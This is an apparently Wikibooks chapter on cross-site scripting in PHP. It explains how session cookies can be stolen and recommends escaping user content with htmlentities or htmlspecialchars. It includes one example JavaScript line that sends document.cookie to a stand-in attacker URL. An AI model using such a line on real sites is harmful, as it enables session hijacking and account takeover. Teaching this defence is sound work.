PHP Programming/Cross Site Scripting Attacks
Problem
editCross site scripting (or XSS) is a basic description of a script sending sensitive information (such as cookies or other session identifiers) to other websites.
Usually, these attacks affect websites that content can be edited or added to. In most cases, session identifiers or even usernames/passwords are stored inside cookies. In the case somebody knows the session identifier, they can easily use it on their machine to do any malicious tasks that you would not be happy about.
Right now, if you are logged in on Wikibooks or any other websites, go to that page, open your browser's console, and paste this into the console:
javascript:void(alert(document.cookie))
These are cookies that are sent to the website each time to identify you. If your site is not XSS-proof, the cracker will write something like this:
javascript:void(document.location('http://killer.website.com/steal_cookie.php?cookie_data='+document.cookie))
that will send the cookie information to their website.
Prevention
editThere is no chance to protect yourself from XSS attacks without removing malicious JavaScript code that would be submitted to another website.
As far, the most common way is to use htmlentities or htmlspecialchars to filter the coding so nobody would add any reserved HTML characters to your site (e.g. blog comments):
$message = htmlentities($message);
Another way to do this is to overall create any kind of "protected mode" code, such as MediaWiki, BBCode or others that have been invented for purpose of easily styling/formatting user's content.